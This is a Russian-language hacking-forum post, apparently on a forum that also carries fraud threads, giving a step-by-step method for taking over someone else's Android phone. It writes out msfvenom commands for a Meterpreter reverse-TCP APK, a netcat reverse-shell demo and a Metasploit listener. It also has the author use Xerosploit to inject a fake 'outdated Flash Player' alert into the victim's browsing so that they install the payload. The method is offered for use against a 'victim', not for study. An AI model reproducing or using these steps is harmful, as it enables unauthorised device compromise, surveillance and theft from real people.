Простой способ взлома смартфона на android

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Сегодня я бы хотел рассказать вам о простом способе взлома смартфона на базе android. В большей степени способ основан на социальной инженерии. Но все же нам придется провести малый ряд атак.



Словарик хакера.

Metasploit - коротко говоря платформа предназначенная для поиска и эксплоутации уязвимостей.​
Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки.​
Exploit - это программа или фрагмент кода использующий уязвимость программного обеспечения(или же веб ресурса и операционной системы)​


Для того что бы хоть как-то разобраться в эксплоитах представим себе такой самый простой пример:

Вы хотите получить привилегию root на вашем android устройстве. Так вот те программы которые вы используете для получения root - это и есть эксплоиты использующие уязвимость android.

Помимо таких эксплоитов есть те что намного страшней. Это эксплоиты 0day. Эти эксплоиты написаны на неизвестную или мало кому известную уязвимость и тем самым могут нанести больший вред.

Что же , сегодня мы создадим payload. Моим способом доставим его нашей "жертве" и получим сессию meterpreter.

Meterpreter - это пэйлоад который обеспечивает доступ к интерактивному шеллу.​
Немного про социальную инженерию(СИ)

Помойму, сколько бы лет не прошло, но самым главным оружием хакера останется социальная инженерия(в том случае если мир не захватят роботы). Социальная инженерия основана на человеческом доверии(в частности). Про СИ написано множество книг.

Может какую-то систему и нельзя взломать, но она создана человеком. А человеческое доверие самая большая уязвимость.​
Вобщем при помощи социальной инженерии мы можем управлять человеком.

В дополнение.

Мой способ состоит из 3-х небольших частей.

ч. 1 ---> создание пэйлоада.

ч. 2 ---> собственно СИ.

ч. 3 ---> получение meterpreter.

Теперь приступим к делу.



Часть 1. - Payload.

Что же для начала запустим metasploit.

Код:
>msfconsole

Теперь давайте откроем новую вкладку в терминале(не у всех, но Shift+Ctrl+T)

Приступим к созданию пэйлоада. Для этого нам понадобится утилита msfvenom.

Эта утилита предназначена для тестирования на проникновение устройств на базе android.

Для начала узнаем наше "имя" в локальной сети.

Код:
>ifconfig

Как видим у меня это 192.168.1.3

Теперь пишем следующее

Код:
>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > tester.apk

LHOST - это как раз таки имя вашего хоста.

PORT - порт к которому в дальнейшем подключится "зараженное" android устройство.



Сейчас постараюсь обьяснить вам как же они работают.

У вас на машине открывается порт. Мы указывали 4444. Далее к этому порту конектится(подключается) android устройство которое мы наградили payload'ом. А теперь рассмотрим все на примере ncat.

Откройте 2-е вкладки в терминале. Допустим первая вкладка это машина хакера, а вторая - жертва. В первой вкладке пишем

Код:
>nc -l -p 8543
Тем самым мы открыли на машине хакера порт 8543. Теперь во второй вкладке пишем следующее

Код:
>nc 192.168.1.6 8543 -e /bin/bash

То есть жертва подключилась к открытому порту на хакерской машине 192.168.1.6 и дала доступ к командной оболочке.

Теперь в первой вкладке вы можете прописать какую-либо команду и вы выполните ее на "машине жертвы". На самом же деле настоящие пайлоады работают намного сложней. Но думаю суть вы уловили.

Так вот, теперь у нас имеется файл tester.apk - наш пэйлоад.

Теперь к интересному.



Часть 2.

В этой части мы будем использовать MITM фрэймворк для проведения атаки "человек по середине" - Xerosploit.

MITM (Man In The Middle - "Человек по середине") -- атака позволяющая хакеру прослушать трафик(подменить) в каком-то смысле претворившись роутером.

Давайте для начала установим xerosploit. Насколько мне известно , в основном он зависим от python, nmap, hping3,

build-essential, ruby-dev, libpcap-dev, libgmp3-dev, tabulate, terminaltables..

Так что перед его установкой установите эти пакеты.

Теперь пишем

Код:
>git clone https://github.com/LionSec/xerosploit
>cd xerosploit
>python install.py

Теперь выберите свой дистрибутив. После установки неплохо бы разобраться в функционале.

Xerosploit весьма многофункционален и легок в использовании. Вот некоторые его возможности:

pscan - сканирование портов.

sniff - сниффинг.

injecthtml - иньекция html кода.

injectjs - иньекция javascript кода.

dspoof - передача трафика на другой локальный хост.

dos - denial of service атака.

И еще много другое.



Запускаем xerosploit

Код:
>xerosploit
Теперь давайте просканируем нашу сеть.

А вот и мое андроид устройство.
Код:
<script>
alert("Приносим свои извинения, но ваша версия Flash Player устарела и вы не можете просмотреть материал данного ресурса. Обновленная версия находится тут:  http://site.test/flash.html");
</script>
cb4f17c9d62d2095c65d5.png

Теперь выберем его. Для этого просто прописываем имя хоста.

П.С: для просмотра функционала просто пропишите help.

Мой способ палевный, но все же рабочий. Давайте зальем наш пэйлоад на какой-нибудь простенький хостинг.

Теперь можете создать js файл с таким содержимым

Далее в новой вкладке снова запустим xerosploit. Сканируем сеть и выбираем нашу цель.

Теперь выберем такую функцию как injectjs > run > имя вашего js файла.



Часть 3.

Теперь осталось получить сессию meterpreter.

В изначально запущенном metasploit пишем следующие команды.

Код:
>use multi/handler
>set payload android/meterpreter/reverse_tcp
>set LHOST 192.168.1.3
>set LPORT 4444
>exploit

И после всех проведенных нами атак жертва по идее открывает наш tester.apk ( желательно переименовать в flash.apk) и мы получаем контроль над ее устройством.

Если я не ошибаюсь то можно вместо xerosploit использовать beef. Так появится еще больше шансов что скрипт выполнится нормально.

На этом все!
 
P

PompachKa13371

Я так понял, все действия происходили на системе "Linux"?
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Passkey – всё: обнаружен простой способ обойти передовую технологию аутентификации Новости в сети 0
S Простой способ получить реальные $30 на торговлю Предоставляю работу. Ищу специалиста. 1
L Простой способ получения пары баксов в день [почти пассив] Способы заработка 4
U Простой способ накрутки чего угодно, где угодно. СИ/Фишинг/Мошенничество 10
U Самой простой способ отрубить инет человеку, зная IP. Полезные статьи 25
Admin Самый простой способ устранить форум на движке IPB Полезные статьи 0
S Самый простой способ сделать прокладку, копии сайта, через фф + ScrapBook Полезные статьи 1
Support81 Личное в публичное: как простой вызов такси оборачивается потерей данных Новости в сети 0
Gorsun4ik Простой вредонос Вопросы и интересы 2
Y 270 рублей за 10-15 минут . Простой заработок Корзина 5
S Песенка спета. Разбираем простой трюк, который поможет отключить чужую Bluetooth колонку Уязвимости и взлом 5
G Простой угон кошелька WebMoney Способы заработка 3
G WPSeku-простой сканер тестирования Wordpress Kali Linux 0
K Простой и быстрый сортировщик базы по странам Софт для работы с текстом/Другой софт 0
V dnsCash.com - простой заработок на регистрации доменов Предоставляю работу. Ищу специалиста. 2
V dnsCash.com - простой заработок на регистрации доменов Способы заработка 1
V dnsCash.com - простой заработок на доменах Предоставляю работу. Ищу специалиста. 1
S Telegram обещал представить простой метод обхода блокировки мессенджера Новости в сети 0
O Самый простой брутфорс почты с Hydra Уязвимости и взлом 1
Admin Реверсинг малвари для начинающих. Разбираем простой вирус Полезные статьи 0
Z Простой заработок на адалте Способы заработка 0
Support81 ZIP-матрешка – новый способ взлома Windows Новости в сети 0
Support81 Децентрализованные мессенджеры: выбираем самый безопасный способ общения Новости в сети 1
Support81 Хватит быть славным парнем! Проверенный способ добиться желаемого в любви, сексе и жизни Свободное общение и флейм 1
Support81 Картинки PNG - новый способ доставки троянов на компьютеры организаций Новости в сети 1
S Закрыто Способ пробива Credit Score (USA) Корзина 1
A Куплю [КУПЛЮ] Способ агрессивного запуска с перекрутом Google Ads "ДОРОГО" Куплю/Продам 1
F как определить способ защиты сохраняемых данных в веб-приложении ? Уязвимости и взлом 0
V Партнерка от vfxAlert - надежный способ монетизировать финансовый трафик! Все что не подошло по разделу 3
Р Интересно Способ вывода с Binance и других бирж без верификации по СМС или 2FA Способы заработка 0
G Интересно Бесплатный и БЕСКОНЕЧНЫЙ Proton VPN (способ получения) Полезные статьи 8
P Интересно Легкий способ получить деньги Другое 1
J Способ заработать на пиво. Набрать подписчиков VK/INST/FACEB/TELEG/TIKTOK. [В теме ИНФО] Способы заработка 1
Denik способ заработка на CPA партнёрках Способы заработка 2
АнАлЬнАя ЧуПаКаБрА Интересно Способ обхода OTP Amazon Другое 0
C 1000 и 1 способ заработать в интернете Обучения, схемы, мануалы 2
Ltybcrf Интересно Взлом mail.ru + Способ удаления телефона с mail.ru Уязвимости и взлом 3
T Интересно Палю новый способ обуза бк олимп до 1000 руб фрибета Способы заработка 5
T Способ заработка на SHRLINK до 1000Р/день Способы заработка 1
F Способ заработка и верификации QIWI Способы заработка 13
X Способ заработка Вопросы и интересы 6
T Способ заработка и верификации QIWI Обучения, схемы, мануалы 10
АнАлЬнАя ЧуПаКаБрА Интересно Способ перевода денег с cc без cvv2 Полезные статьи 0
П Нахождение ip телефона, подскажите способ. Уязвимости и взлом 9
АнАлЬнАя ЧуПаКаБрА Интересно Взлом и бесплатная подписка (-95% скидка ) на в любом прокси селлере (способ снятия ограничения) Раздача dedic/ssh/proxy 1
S Simjacker: новый способ взлома телефона через симку Уязвимости и взлом 4
G Как взять микрозайм на Яндекс.Деньги или другой способ без ввода CVC? Вопросы и интересы 2
W Способ шипа от Ketons (WISH) (эксклюзивный слив) Полезные статьи 2
E Всё об адвёртинге | Самый свежий способ мошенничества Способы заработка 0
Uno-uno Закрыто СПОСОБ ЗАЛИВА РЕКЛАМЫ ФБ Корзина 4

Название темы